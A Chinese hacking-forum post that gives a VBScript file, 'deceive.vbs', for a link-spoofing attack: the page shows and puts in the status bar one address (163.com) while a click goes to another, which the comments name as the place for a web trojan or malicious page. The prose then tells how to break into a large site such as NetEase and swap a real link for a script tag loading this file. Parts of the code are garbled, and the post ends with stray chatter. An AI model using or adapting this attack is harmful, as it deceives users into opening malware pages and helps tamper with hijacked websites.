''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'（以下请根据实际情况自行修改：）
url1="http://www.163.com/"
url2="http://www.google.com/"
text="http://www.163.com/"
url="_blank ?＞http://";&url1&chr(1)& ... p;url2&""
dn="/"
mouseover="onmouseover=""javascript :window.status='_blank ?＞http://";&url1&dn&"'"""
mouseout="onmouseout=""javascript :window.status=''"""
click="onclick=""javascript :navigate('"&url&"')"""
style="style=""cursor:hand"""
tag="＜span "&style&" "&mouseover&" "&mouseout&" "&click&"＞＜font color=""#0000ff""＞＜u＞"&text&"＜/u＞＜/font＞＜/span＞"
document.write tag
'说明：
'url1是用来欺骗用户的地址.
'url2是实际访问的地址，可以是网页木马、恶意网页等.
'text是链接的文字.
'注意：(以上欺骗地址及实际地址不可以加"http://")
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

　　现在大家看到了吧~~当我们点击这个测试页面的时候，链接1指向的是google.com，而且状态栏和地址栏里都显示"_blank＞http://www.163.com/"，链接2却指向163.com。你也许感到不可思议，但这就是域名欺骗漏洞的魅力。

　　我们可以想象，如果以上的测试页面中的链接1指向的不是google.com，而是我们的网页木马，那就......

　　不过，一个普通的个人网站没人会看的，这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站，比如网易（哇~~~~~~这时候一只菜鸟推着一车砖头，看着我......）。这时候就可以把它的页面给改了。

　　比如有一个文字链接，我们就可以把代码中的"＜a href="xxxxx.htm"＞xxxxxx＜/a＞"改为我们自己的代码："＜script language="vbscript" src="deceive.vbs"＞＜/script＞"。看到src属性里的deceive.vbs了吗 ？我们要编辑好这个文件，然后上传到要修改的页面目录下。

砍不到了 - -
早发完了的
嘿嘿